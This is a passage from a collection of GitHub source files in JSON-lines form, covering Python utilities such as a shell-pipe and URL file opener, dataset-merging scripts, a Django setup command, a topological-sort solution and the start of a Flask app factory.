\"\"\n try:\n with open(directory+\"/q_src.java\") as f:\n q_source = f.read()\n with open(directory+\"/a_src.java\") as f:\n a_source = f.read()\n except FileNotFoundError:\n print(directory+\" does not contain files\")\n return 0\n\n q_id, a_id = directory.split(\"/\")[-1].split(\"-\")\n\n print(\"# ID:{0} is being extracted # Pair({1})\".format(\n q_id, directory.split(\"/\")[-1]))\n\n # Shape the data\n data = {\"q_id\": q_id, \"a_id\": a_id,\n \"q_src\": q_source, \"a_src\": a_source}\n try:\n shaped_data = self.shape_data(app, data, directory)\n except FileNotFoundError:\n print(directory+\" does not contain files\")\n return 0\n\n # Write out the data\n self.write(self.out_path, shaped_data)\n\n return 1\n\n # Shape the data\n def shape_data(self, app, data, directory):\n ret = []\n q_id = data[\"q_id\"]\n a_id = data[\"a_id\"]\n q_src = data[\"q_src\"]\n a_src = data[\"a_src\"]\n \n q_tokens = app.get_token(q_src)\n a_tokens = 
app.get_token(a_src)\n\n # Check the directories\n q_anchor_path = directory+\"/q_anchor.txt\"\n a_anchor_path = directory+\"/a_anchor.txt\"\n addition_path = directory+\"/addition.txt\"\n removal_path = directory+\"/removal.txt\"\n if not os.path.exists(q_anchor_path):\n print(directory+\" does not exist\")\n raise FileNotFoundError\n if not os.path.exists(a_anchor_path):\n print(directory+\" does not exist\")\n raise FileNotFoundError\n if not os.path.exists(addition_path):\n print(directory+\" does not exist\")\n raise FileNotFoundError\n if not os.path.exists(removal_path):\n print(directory+\" does not exist\")\n raise FileNotFoundError\n\n # Shape the recommend data\n q_anchor = []\n with open(q_anchor_path) as f:\n for line in f:\n content = line.split(\" \", 2)\n index = int(content[1])\n code = content[2].replace(\"\\n\", \"\")\n q_anchor.append((index, code))\n \n a_anchor = []\n with open(a_anchor_path) as f:\n for line in f:\n content = line.split(\" \", 2)\n index = int(content[1])\n code = content[2].replace(\"\\n\", \"\")\n a_anchor.append((index, code))\n\n # Collect the insertion operations\n recommends = []\n with open(addition_path) as f:\n for line in f:\n content = line.split(\" \", 2)\n index = int(content[1])\n code = content[2].replace(\"\\n\", \"\")\n line_in_clone = -1\n for i in range(0, len(a_anchor)):\n if a_anchor[i][0] > index:\n line_in_clone = i\n elif line_in_clone == -1:\n if len(q_anchor) > 0:\n recommends.append(\" \"+\n app.get_token(code)+\" \"+app.get_token(q_anchor[0][1]))\n else:\n recommends.append(\" \"+app.get_token(code))\n break\n else:\n recommends.append(\" \"+\n app.get_token(code)+\" \"+app.get_token(q_anchor[line_in_clone][1]))\n break\n if len(recommends) == 0:\n recommend_str = \"\"\n else:\n recommend_str = \" \".join(recommends) + \" \"\n \n ret.append([q_id, a_id, q_tokens, recommend_str])\n\n # Collect the deletion operations\n recommends = []\n with open(removal_path) as f:\n for line in f:\n content = line.split(\" \", 2)\n index = int(content[1])\n code = content[2].replace(\"\\n\", \"\")\n line_in_clone = -1\n for i in range(0, len(q_anchor)):\n if q_anchor[i][0] > index:\n line_in_clone = i\n elif line_in_clone == -1:\n if len(a_anchor) > 0:\n recommends.append(\" \"+\n app.get_token(code)+\" \"+app.get_token(q_anchor[0][1]))\n else:\n recommends.append(\" \"+app.get_token(code))\n break\n else:\n recommends.append(\" \"+\n app.get_token(code)+\" \"+app.get_token(q_anchor[line_in_clone][1]))\n break\n if len(recommends) == 0:\n recommend_str = \"\"\n else:\n recommend_str = \" \".join(recommends) + \" \"\n \n ret.append([q_id, a_id, q_tokens, recommend_str])\n \n return ret\n\n # Initialize the output destination\n def init_file(self, out_path):\n if not os.path.exists(out_path):\n os.mkdir(out_path)\n with open(out_path+\"/input.txt\", \"w\") as f_i:\n f_i.write(\"\")\n with open(out_path+\"/output.txt\", \"w\") as f_o:\n f_o.write(\"\")\n\n # Write out the data\n def write(self, out_path, data_list):\n with open(out_path+\"/input.txt\", \"a\") as f_i:\n with open(out_path+\"/output.txt\", \"a\") as f_o:\n for i, (q_id, a_id, q_token, a_token) in enumerate(data_list):\n f_i.write(\"{0}-{1} {2} {3}\\n\".format(\n q_id, a_id, i, q_token.replace('\n', '
')))\n f_o.write(\"{0}-{1} {2} {3}\\n\".format(q_id, a_id, i, a_token))\n\n\nclass ConvertError(Exception):\n def __str__(self):\n return \"This is Convert Exception\"\n","repo_name":"nitamago/DebugConcierge","sub_path":"Data_Maker/Data_Maker.py","file_name":"Data_Maker.py","file_ext":"py","file_size_in_byte":8469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"29708114894","text":"\"\"\" open pipes, urls ... uniformly with Popen, urlopen ... open\n\nopenplus() opens pipes and some other objects that quack like files,\nas well as files:\n | pipe ... -- Popen() a shell\n http:// ftp:// ... -- urlopen()\n `ls $x`, `geturl web data` -- shell -> filename or url\n ~/a/b -- sh ls\n .gz -- gunzip\n - -- stdin / stdout\n else -- the builtin open()\n\nUsers can then read e.g.\n \"| filter data | sort\"\n \"| convert ... xx.jpg\"\n \"`geturl web data`\"\nlike files, just by importing openplus and changing open() -> openplus().\n\nThe idea is that if it walks like a file and quacks like a file,\ni.e. can open/get/put a data stream, or generates a file name or object,\nlet it be used anywhere a \"real\" file can be used.\n(However xxopen() may lack some methods of __builtin__.open() .)\n\nError handling is left up to Popen() ... open()\nexcept for `shell expand`, which writes an error message to errout (sys.stderr)\nif the result is not a url or os.path.isfile().\n\n\"\"\"\n # wibni: > awindow, < aparamwindow -- pyqt\n # reinventing this wheel ...\n\nimport gzip\nimport os.path\nimport re\nimport subprocess # py 2.4\nimport sys\nimport urllib2\n\n__version__ = __date__ = \"11dec2008\"\n__author__ = \"Denis Bzowy\"\n\n_urlpat = re.compile( \"[a-z+]+://\" ) # http:// ftp:// ... 20+ in urlparse\n\n#-------------------------------------------------------------------------------\ndef openplus( filelike, rw='r', errout=sys.stderr ):\n \"\"\" open pipes, urls ... uniformly with Popen, urlopen ... open \"\"\"\n start = filelike[0]\n if start == '|':\n if rw[0] == 'r':\n return subprocess.Popen( filelike[1:], shell=True,\n stdout=subprocess.PIPE) .stdout\n # for line in a pipe: see http://bugs.python.org/issue3907\n else:\n return subprocess.Popen( filelike[1:], shell=True,\n stdin=subprocess.PIPE) .stdin\n\n elif _urlpat.match( filelike ):\n return urllib2.urlopen( filelike )\n\n elif start == '~': # ~/x -> $HOME/x, ~sam/x -> sam's home /x (aka glob)\n ls = sh( \"/bin/ls -d \" + filelike, errout ) # not all shells\n return open( ls, rw )\n\n elif start == '`':\n # sh: `ls ${x-default}`, `newest *.py`, `geturl web data`\n # -> filename or url, not | etc.\n shexpand = sh( filelike.strip('`'), errout )\n if _urlpat.match( shexpand ):\n return urllib2.urlopen( filelike )\n if os.path.isfile( shexpand ):\n return open( shexpand, rw )\n if errout: # logger ?\n print >>errout, \"error: openplus( \\\"%s\\\" ) = \\\"%s\\\" \" \\\n \"is not a file or url\" % (filelike, shexpand)\n return None\n\n # ! 
eval pyfunc() -> a file-like object with next() etc.\n # elif start == '!':\n # return eval( filelike[1:] ) # wrong globals(), unsafe, mttiw\n\n elif filelike.endswith( \".gz\" ):\n return gzip.GzipFile( filelike, rw )\n\n elif filelike == '-':\n return (sys.stdin if rw[0] == 'r' else sys.stdout)\n\n else:\n return open( filelike, rw ) # a \"real\" file\n\n\n#...............................................................................\ndef sh( cmd_arg_str, errout=sys.stderr ):\n r\"\"\" Popen a shell -> line or \"line1 \\n line2 ...\", trim last \\n \"\"\"\n # crashes after pyqt QApplication() with mac py 2.5.1, pyqt 4.4.2 \n # subprocess.py _communicate select.error: (4, 'Interrupted system call')\n # see http://bugs.python.org/issue1068268 subprocess is not EINTR-safe\n # QProcess instead of Popen works\n\n (lines, err) = subprocess.Popen( cmd_arg_str,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True ) \\\n .communicate() # wait til process ends\n if errout and err:\n print >>errout, err\n # trim the last \\n so sh( \"ls xx\" ) -> \"xx\" not \"xx\\n\"\n # and split( \"\\n\" ) -> no extra \"\"\n return lines[:-1] if (lines and lines[-1] == \"\\n\") \\\n else lines\n\n# end openplus.py\n","repo_name":"ActiveState/code","sub_path":"recipes/Python/576582_openplus_open_pipes_urls__uniformly_Popen/recipe-576582.py","file_name":"recipe-576582.py","file_ext":"py","file_size_in_byte":3991,"program_lang":"python","lang":"en","doc_type":"code","stars":1912,"dataset":"github-code","pt":"91"} +{"seq_id":"12479547374","text":"pwd = 123456\naccount = '123'\nmoney = 9999\nzhanghao = input('请输入账号:')\nmima = int(input('请输入密码:'))\nif zhanghao == account and mima == pwd:\n print('登录成功')\n my = float(input('请输入取款金额:'))\n if my > money:\n print('余额不足')\n else:\n print('取款成功')\nelse:\n print('账号密码错误')\n\n","repo_name":"yize11/1808","sub_path":"07day/02-银行取款.py","file_name":"02-银行取款.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"25397110214","text":"from helper.functions import getFilesInPath\nimport shutil, argparse, os\n\ndef main():\n parser = argparse.ArgumentParser(description='Fuse datasets')\n parser.add_argument('--fusedPath',help='Path for new folder', required=True)\n parser.add_argument('--foldersDataset', nargs='+', help='Folders to join dataset', required=True)\n args = parser.parse_args()\n\n if os.path.exists(args.fusedPath):\n shutil.rmtree(args.fusedPath)\n\n os.makedirs(args.fusedPath)\n\n finalSubject = 0\n for idx, f in enumerate(args.foldersDataset):\n filesInDir = getFilesInPath(f)\n sorted_files = sorted(filesInDir, key=lambda x: int(x.split(os.path.sep)[-1].split('_')[0]) )\n finalSubject += int(idx > 0 and int(sorted_files[0].split(os.path.sep)[-1].split('_')[0]) == 0 )\n for fid in sorted_files:\n fileName = fid.split(os.path.sep)[-1]\n subjectNumber = int(fileName.split('_')[0])\n if idx == 0:\n shutil.copyfile(fid,os.path.join(args.fusedPath,fileName))\n else:\n nFileName = fileName.split('_')\n nSubbectNumber = str(finalSubject+subjectNumber)\n nFileName[0] = nSubbectNumber\n nFileName[4] = nSubbectNumber\n shutil.copyfile(fid, os.path.join(args.fusedPath, '_'.join(nFileName)))\n\n finalSubject = int(sorted_files[-1].split(os.path.sep)[-1].split('_')[0])\n\nif __name__ == '__main__':\n 
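    # entry point: parse the command-line arguments and fuse the datasets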
main()","repo_name":"jbcnrlz/biometricprocessing","sub_path":"fusedatasetsfortraining.py","file_name":"fusedatasetsfortraining.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"71480060143","text":"import argparse\nimport os\nimport subprocess\nimport yaml\n\nfrom release_common import \\\n run, get_pubspec_version, build_package_map, update_pubspec_dependency, \\\n MOJO_SDK_SRC_DIR, MOJO_SDK_PUBSPEC, PUB, SRC_DIR\n\ndef main():\n parser = argparse.ArgumentParser(description='Rev Mojo Dart SDK package')\n parser.parse_args()\n\n # Make the mojo_sdk package depend on the current versions of all leaf\n # packages. The current versions are taken from the source tree and not\n # the pub server. After updating the required dependency versions, this\n # script will verify that the pub can satisfy the package constraints.\n # This means that someone must have published the packages to pub and\n # that pub and the source tree agree on the current version number of\n # each leaf package.\n print('Updating leaf package dependencies to latest...')\n leaf_packages = ['mojo',\n 'mojo_services']\n package_map = build_package_map(leaf_packages)\n for leaf_package in package_map:\n leaf_package_dir = package_map[leaf_package]\n assert(leaf_package_dir != None)\n leaf_package_pubspec = os.path.join(leaf_package_dir, 'pubspec.yaml')\n # Get current the version number for leaf_package.\n leaf_package_version = get_pubspec_version(leaf_package_pubspec)\n # Update the mojo_sdk pubspec to depend the current version number.\n update_pubspec_dependency(MOJO_SDK_PUBSPEC,\n leaf_package,\n leaf_package_version)\n\n # Verify that pub can find all required package versions.\n run(MOJO_SDK_SRC_DIR, [PUB, 'get', '-n'])\n\n # Now, rev package.\n run(SRC_DIR,\n ['mojo/dart/tools/release/rev_pub_package.py',\n '--packages',\n 'mojo_sdk'])\n\nif __name__ == '__main__':\n main()\n","repo_name":"amplab/ray-core","sub_path":"src/mojo/dart/tools/release/rev_sdk.py","file_name":"rev_sdk.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"} +{"seq_id":"35674249915","text":"import datetime\nimport platform\nimport os\nimport time\nimport datetime\nimport webbrowser\nimport pprint\nimport requests\nurl =\"http://gloperenab.me/Proyecto1Equipo/consulta_proyectos.php\"\nr=requests.get(url)\ndata= r.text\n\nciclo = 1\n\nwhile ciclo == 1:\n print(\"Seleccione una opcion: \")\n print(\"1.-Listado de proyectos\")\n\n\n opcion = (int(input()))\n print(opcion)\n if opcion == 1:\n datado = data.split(sep=\"|\", maxsplit=100)\n for sub in datado:\n sub_split = sub.split(\",\")\n print(sub_split)\n print(\" \")\n print(\"Ingrese una opción\")\n print(\"1.- Ingresar nuevos prametros\")\n print(\"2.- Descargar proyecto desde web\")\n print(\"3.- Tomar instantanea\")\n print(\"4.- Finalizar ejecución\")\n opcion2 = (int(input()))\n\n if opcion2 == 1:\n print(\" \")\n # cursor.execute(\"SELECT * FROM parametros\")\n # print(\" \")\n print(\"Ingresa la fecha y hora de inicio en el siguiente formato YYYY-MM-DD HH:MM:SS\")\n datas = input('Ingrese fecha [YYYY-MM-DD HH:MM:SS]: ')\n datas = datetime.datetime.strptime(datas, '%Y-%m-%d %H:%M:%S')\n nowdate = datas.date().isoformat()\n print(\" \")\n print(datas)\n print(\"Ingresa la cantidad de fotografías que desea tomar en ese intervalo de tiempo:\")\n cantidadfotos = (int(input()))\n\n while cantidadfotos <= 
0:\n print(\"entró al while\")\n if cantidadfotos <= 0:\n print(\"Ingrese una cantidad de fotografias mayor a 0.\")\n cantidadfotos = (int(input()))\n print(\" \")\n print(\"Ingresa el intervalo en el que desea tomar las fotografias:\")\n intervaloproyecto = (int(input()))\n\n while intervaloproyecto <= 0:\n print(\"entró al while\")\n if intervaloproyecto <= 0:\n print(\"Ingrese un intervalo mayor a 0 o tome una instantanea.\")\n intervaloproyecto = (int(input()))\n\n pload = {'entrada': datas,\n 'salida': datas,\n 'intervalo': intervaloproyecto,\n 'cantidad': cantidadfotos\n }\n r = requests.post('http://www.gloperenab.me/Proyecto1Equipo/insertar_parametros.php',data = pload)\n\n print('Orden enviada.')\n # cursor.execute(\"INSERT INTO parametros(entrada) VALUES('{0}')\".format(datas))\n # conexion.commit()\n\n if opcion2 == 2:\n url=\"http://gloperenab.me/Proyecto1Equipo/index.php\"\n webbrowser.open(\"http://gloperenab.me/Proyecto1Equipo/index.php\", new=2, autoraise=True)\n webbrowser.open_new_tab(url)\n if opcion2 == 3:\n print(\"Instantanea\")\n pload = {'entrada': \"2021-05-08 15:15:15\",\n 'salida': \"2021-05-08 15:15:15\",\n 'intervalo': 0,\n 'cantidad': 1\n }\n r = requests.post('http://www.gloperenab.me/Proyecto1Equipo/insertar_parametros.php', data=pload)\n print(\"Se mandó la orden de la instantanea\")\n if opcion2 == 4:\n quit()\n\n","repo_name":"RodrigoDLGA/Equipo_6_Captura_Imagenes","sub_path":"Entregables/27688_Equipo_06/Script Python/ScriptFotos.py","file_name":"ScriptFotos.py","file_ext":"py","file_size_in_byte":3070,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"74599462062","text":"from __future__ import annotations\nimport os\nimport numpy as np\nfrom typing import List\nfrom typing import TYPE_CHECKING\nif TYPE_CHECKING:\n from portpy.photon.plan import Plan\n\n\ndef get_eclipse_fluence(my_plan: Plan, sol: dict, path: str = None, beam_ids: List[str] = None) -> None:\n \"\"\"\n save eclipse fluence in the path directory\n\n :param my_plan: object of class Plan\n :param sol: dictionary containing optimal intensity\n :param path: directory for saving the optimal fluence\n :param beam_ids: list of string containing beam ids\n\n \"\"\"\n if path is None:\n path = os.getcwd()\n if not os.path.exists(path):\n os.makedirs(path)\n tol = 1e-06\n inf_matrix = sol['inf_matrix']\n optimal_fluence_2d = inf_matrix.fluence_1d_to_2d(sol=sol)\n for i in range(len(optimal_fluence_2d)):\n if beam_ids is not None:\n beam_id = beam_ids[i]\n else:\n beam_id = str(inf_matrix.beamlets_dict[i]['beam_id'])\n file_name = 'ID' + beam_id + '.optimal_fluence'\n filepath = os.path.join(path, file_name)\n f = open(filepath, 'w')\n fluence_2d = optimal_fluence_2d[i]/(my_plan.get_prescription()/my_plan.get_num_of_fractions())\n f.write('optimalfluence\\n')\n f.write('SizeX {}\\n'.format(fluence_2d.shape[1]))\n f.write('SizeY {}\\n'.format(fluence_2d.shape[0]))\n f.write('SpacingX {}\\n'.format(2.5))\n f.write('SpacingY {}\\n'.format(2.5))\n beamlets = inf_matrix._beams.beams_dict['beamlets'][i]\n x_positions = beamlets['position_x_mm'][0] - beamlets['width_mm'][\n 0] / 2 # x position is center of beamlet. Get left corner\n y_positions = beamlets['position_y_mm'][0] + beamlets['height_mm'][\n 0] / 2 # y position is center of beamlet. 
Get top corner\n f.write('OriginX {}\\n'.format(np.min(x_positions) + 1.25)) # originX should be the center of the first beamlet, but beamlet.X is the left\n f.write('OriginY {}\\n'.format(np.max(y_positions) - 1.25)) # originY should be the center of the first beamlet, but beamlet.Y is the top\n f.write('Values\\n')\n f.close()\n fluence_2d[fluence_2d < tol] = 0\n mat = np.matrix(fluence_2d)\n with open(filepath, 'a') as f:\n for line in mat:\n np.savetxt(f, line, fmt='%.6f', delimiter='\\t')\n\n # np.savetxt(fileName, optimal_fluence_2d[i], '-append', 'delimiter'='\\t', 'precision', '%.10G')\n\n","repo_name":"PortPy-Project/PortPy","sub_path":"portpy/photon/utils/get_eclipse_fluence.py","file_name":"get_eclipse_fluence.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"91"} +{"seq_id":"40525070348","text":"# For BFS we start the traversal from the root courses and gradually spread to all courses; unlike DFS, BFS adds an indegree counter that records how many prerequisite courses are still untaken\n# A course can only be taken once its indegree reaches 0!!!\nfrom collections import defaultdict, Counter, deque\nclass Solution:\n def findOrder(self, N: int, pres: List[List[int]]) -> List[int]:\n dic, indegree = defaultdict(set), Counter()\n for u, v in pres:\n dic[v].add(u)\n indegree[u] += 1\n seq = []\n # At initialization, take the courses whose indegree is 0\n dq = deque([x for x in range(N) if indegree[x] == 0])\n # An interesting point here: if the prerequisites contain a cycle, we should return []; this indegree design guarantees that only courses with indegree 0 can unlock new courses\n # If the topological graph contains a cycle, the courses inside it will never reach indegree 0 and will never be appended to seq! So at the end we only need to check the length of seq.\n while dq:\n c = dq.popleft()\n seq.append(c)\n for nxt in dic[c]:\n indegree[nxt] -= 1\n if indegree[nxt] == 0:\n dq.append(nxt)\n return seq if len(seq) == N else []\n\n# This problem is hard to get started on, because the hidden condition for being able to finish all courses is that the traversal must not contain a cycle; the DFS solution starts exactly from that cycle check\n# Return False if there is a cycle; the outer loop is over range(N)\n# DFS\nfrom collections import defaultdict, deque\nclass Solution:\n def findOrder(self, N: int, pres: List[List[int]]) -> List[int]:\n dic = defaultdict(set)\n for u, v in pres:\n dic[u].add(v)\n seq = []\n check = [0] * N # check has three states: 0 means not visited yet; 1 means currently being visited; 2 means fully processed (the course can already be taken)\n def dfs(i):\n if check[i] == 1: return False\n if check[i] == 2: return True\n check[i] = 1\n for nxt in dic[i]:\n if not dfs(nxt): return False\n # Only after all of i's prerequisite courses have been visited without any returning False (i.e. all of i's prerequisites can be taken) can i itself be taken!!!\n check[i] = 2\n seq.append(i)\n return True\n for i in range(N):\n if not dfs(i):\n return []\n return seq","repo_name":"Bieneath/LeetCode_training","sub_path":"Week-1024/210.py","file_name":"210.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"30906916080","text":"#!/usr/bin/env python\n\nimport csv\nimport os\nfrom os.path import basename\n\ncsvFiles = []\n\npath = raw_input(\"Enter the path where power csv files are stored:\\n\")\nos.chdir(path)\nif os.path.exists(\"Power_Summery.csv\"):\n\tos.remove(\"Power_Summery.csv\")\nfp = open(\"Power_Summery.csv\", 'a')\n\nfp.write(\"UseCase Name\"+\",\"+\"CPU_Power\"+\",\"+\"GPU_Power\"+\",\"+\"SOC_Power\"+\",\"+\"DRAM\"+\",\"+\"AP_RAM\\n\")\n\nfor file in os.listdir(path):\n\tif file.endswith(\".csv\"):\n\t\tcsvFiles.append(file)\n\t\t\nfor file in csvFiles:\n\ttmpFile=open(file, 'r')\n\treader = csv.reader(tmpFile)\n\tfor line in reader:\n\t\tif any(\"Source\" in s for s in line):\n\t\t\tcontinue\n\t\tif not line:\n\t\t\tcontinue\n\t\tif any(\"Scan started\" in s for s in line):\n\t\t\tbreak\n\t\telse:\n\t\t\tif line[0]==\"VDD_CPU_Power\":\n\t\t\t\tfp.write(os.path.splitext(file)[0]+\",\"+'%.1f' % float(line[4]))\n\t\t\tif 
line[0]==\"VDD_GPU_Power\":\n\t\t\t\tfp.write(\",\"+'%.1f' % float(line[4]))\n\t\t\tif line[0]==\"VDD_SOC_Power\":\n\t\t\t\tfp.write(\",\"+'%.1f' % float(line[4]))\n\t\t\tif line[0]==\"DRAM\":\n\t\t\t\tfp.write(\",\"+'%.1f' % float(line[4]))\n\t\t\tif line[0]==\"AP_RAM\":\n\t\t\t\tfp.write(\",\"+'%.1f' % float(line[4])+\"\\n\")\n\t\t\telse:\n\t\t\t\tcontinue\n\nfp.close()\nprint(\"Power_Summery.csv file generated\")\n\n","repo_name":"sunilthorat09/ForPractice","sub_path":"Generate_Power_Report_Jetson.py","file_name":"Generate_Power_Report_Jetson.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"21570440037","text":"from datasets import concatenate_datasets, load_dataset, Features, Translation\n\nif __name__ == \"__main__\":\n # Define the mapping for the translation feature\n translation_features = Features({\n \"translation\": Translation(languages=[\"en\", \"it\"]),\n })\n\n # Load the datasets from HuggingFace\n synth_fr = load_dataset(\"irenepap/en-fr2it-synthetic-data\", split='train', features=translation_features)\n synth_ro = load_dataset(\"irenepap/en-ro2it-synthetic-data\", split='train', features=translation_features)\n synth_it = load_dataset(\"irenepap/en-it-synthetic-data\", split='train', features=translation_features)\n original = load_dataset(\"j0hngou/ccmatrix_en-it_subsampled\", split='train').remove_columns([\"id\", \"score\"])\n\n # Select from the original samples according to the size of the synthetic data\n train_idx_start = 3000\n train_idx_end = train_idx_start + len(synth_fr)\n original = original.select(range(train_idx_start, train_idx_end))\n\n # Concatenate either the high or low resource synthetic data with the original\n hrs_data = concatenate_datasets([original, synth_fr, synth_ro])\n lrs_data = concatenate_datasets([original, synth_it])\n assert hrs_data.num_rows == lrs_data.num_rows, \"HRS and LRS datasets should have the same size\"\n\n # Push the merged datasets to the HuggingFace hub\n lrs_data.push_to_hub(\"en-it-lrs-data\")\n hrs_data.push_to_hub(\"en-it-hrs-data\")\n","repo_name":"j0hngou/LRNMT","sub_path":"scripts/synthesis_merge.py","file_name":"synthesis_merge.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"91"} +{"seq_id":"42590393161","text":"# Databricks notebook source\n# MAGIC %run ../app/install_master_package\n\n# COMMAND ----------\n\nfrom __myproject__.app.init import spark, loggerFactory, parameters\nfrom time import time, sleep\n\nlogger = loggerFactory.create('my_test_logger')\n\n# COMMAND ----------\n\nlogger.info('Starting', extra={\n 'time': time(),\n})\n\nsleep(1)\n\nlogger.warning(parameters.myparameter.myvalue)\n\na = [1, 2, 3, 4]\nb = [2, 3, 4, 8]\ndf = spark.createDataFrame([a, b], schema=['a', 'b'])\n\ndf.show()\n\nlogger.info('Finished', extra={\n 'time': time(),\n})\n","repo_name":"bricksflow/bricksflow","sub_path":"src/__myproject__/solutions/spark_test.py","file_name":"spark_test.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"91"} +{"seq_id":"34905501717","text":"import os.path\nimport environ\n\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.contrib.auth.models import User\nfrom django.conf import settings\nfrom django.contrib.sites.models import Site\nfrom allauth.socialaccount.models import 
SocialApp\n\nclass Command(BaseCommand):\n help = \"create superuser and social accounts from .env file\"\n env = environ.Env(\n SUPERUSER_USERID = (str, 'admin'),\n SUPERUSER_EMAIL = (str, 'admin@example.com'),\n SUPERUSER_PASSWORD = (str, 'adminadmin'),\n DOMAIN_NAME = (str, settings.DOMAIN_NAME),\n COMPANY_NAME = (str, settings.COMPANY_NAME),\n\n GOOGLE_CLIENT_ID = (str, ''),\n GOOGLE_SECRET = (str, ''),\n GITHUB_CLIENT_ID = (str, ''),\n GITHUB_SECRET = (str, ''),\n FACEBOOK_CLIENT_ID = (str, ''),\n FACEBOOK_SECRET = (str, ''),\n SPORTS_ENGINE_CLIENT_ID = (str, ''),\n SPORTS_ENGINE_SECRET = (str, ''),\n )\n\n def add_arguments(self, parser):\n parser.add_argument('--env_file', help = 'Environment file', default = 'secrets.env')\n\n def handle(self, *args, **options):\n self.read_env(options['env_file'])\n self.create_superuser()\n self.create_site()\n for provider in ('GITHUB', 'FACEBOOK', 'GOOGLE', 'SPORTS_ENGINE'):\n if len(self.env(provider + '_CLIENT_ID')):\n self.create_social_account(provider.capitalize(), \n self.env(provider + '_CLIENT_ID'), \n self.env(provider + '_SECRET'))\n\n\n def create_superuser(self):\n User.objects.create_superuser(\n self.env('SUPERUSER_USERID'),\n self.env('SUPERUSER_EMAIL'),\n self.env('SUPERUSER_PASSWORD')\n )\n print('Created superuser', self.env('SUPERUSER_USERID'))\n\n def read_env(self, env_file):\n env_file = os.path.join(settings.BASE_DIR, env_file)\n if os.path.isfile(env_file):\n environ.Env.read_env(env_file)\n\n def create_social_account(self, name, client_id, secret):\n app = SocialApp.objects.create(provider = name.lower(), name = name, client_id = client_id, secret = secret)\n app.sites.add(Site.objects.get_current())\n app.save()\n print('Create social account', name)\n\n def create_site(self):\n site = Site.objects.get_current()\n site.domain = self.env('DOMAIN_NAME')\n site.name = self.env('COMPANY_NAME')\n site.save()\n print('Created site', site.domain)\n","repo_name":"thomasd57/django_allauth","sub_path":"authenticate/management/commands/init_db.py","file_name":"init_db.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"36891571756","text":"import datetime\nimport logging\nimport os\nfrom http import HTTPStatus\nfrom logging.handlers import RotatingFileHandler\n\nimport bleach\nimport markdown as _markdown\nfrom bleach_allowlist import markdown_attrs, markdown_tags\nfrom flask import Flask, jsonify, render_template, request\nfrom flask_bootstrap import Bootstrap\nfrom flask_limiter import Limiter\nfrom flask_limiter.util import get_remote_address\nfrom flask_login import LoginManager\nfrom flask_mail import Mail\nfrom flask_migrate import Migrate\nfrom flask_sitemap import Sitemap\nfrom flask_wtf.csrf import CSRFProtect\nfrom markupsafe import Markup\n\nfrom .config import config\n\n\nbootstrap = Bootstrap()\nmail = Mail()\n\nlogin_manager = LoginManager()\nlogin_manager.session_protection = \"strong\"\nlogin_manager.login_view = \"auth.login\"\n\nlimiter = Limiter(\n key_func=get_remote_address, default_limits=[\"100 per minute\", \"5 per second\"]\n)\n\nsitemap = Sitemap()\ncsrf = CSRFProtect()\n\n\ndef create_app(config_name=\"default\"):\n app = Flask(__name__)\n app.config.from_object(config[config_name])\n config[config_name].init_app(app)\n from .models import db\n\n bootstrap.init_app(app)\n mail.init_app(app)\n db.init_app(app)\n login_manager.init_app(app)\n limiter.init_app(app)\n sitemap.init_app(app)\n 
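# enable CSRF validation for every POST endpoint registered on the app below\n 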
csrf.init_app(app)\n\n from .main import main as main_blueprint\n\n app.register_blueprint(main_blueprint)\n\n from .auth import auth as auth_blueprint\n\n app.register_blueprint(auth_blueprint, url_prefix=\"/auth\")\n\n max_log_size = 10 * 1024 * 1024 # start new log file after 10 MB\n num_logs_to_keep = 5\n file_handler = RotatingFileHandler(\n \"/tmp/openoversight.log\", \"a\", max_log_size, num_logs_to_keep\n )\n\n file_handler.setFormatter(\n logging.Formatter(\n \"%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]\"\n )\n )\n\n app.logger.setLevel(logging.INFO)\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n app.logger.info(\"OpenOversight startup\")\n\n gunicorn_logger = logging.getLogger('gunicorn.error')\n app.logger.handlers = gunicorn_logger.handlers\n app.logger.setLevel(gunicorn_logger.level)\n\n # Also log when endpoints are getting hit hard\n limiter.logger.addHandler(file_handler)\n\n # Define error handlers\n def create_errorhandler(code, error, template):\n \"\"\"\n Create an error handler that returns a JSON or a template response\n based on the request \"Accept\" header.\n :param code: status code to handle\n :param error: response error message, if JSON\n :param template: template response\n \"\"\"\n\n def _handler_method(e):\n if request.accept_mimetypes.best == \"application/json\":\n return jsonify(error=error), code\n return render_template(template), code\n\n return _handler_method\n\n error_handlers = [\n (HTTPStatus.FORBIDDEN, \"Forbidden\", \"403.html\"),\n (HTTPStatus.NOT_FOUND, \"Not found\", \"404.html\"),\n (HTTPStatus.REQUEST_ENTITY_TOO_LARGE, \"File too large\", \"413.html\"),\n (HTTPStatus.TOO_MANY_REQUESTS, \"Too many requests\", \"429.html\"),\n (HTTPStatus.INTERNAL_SERVER_ERROR, \"Internal Server Error\", \"500.html\"),\n ]\n for code, error, template in error_handlers:\n # Pass generated errorhandler function to @app.errorhandler decorator\n app.errorhandler(code)(create_errorhandler(code, error, template))\n\n # create jinja2 filter for titles with multiple capitals\n @app.template_filter(\"capfirst\")\n def 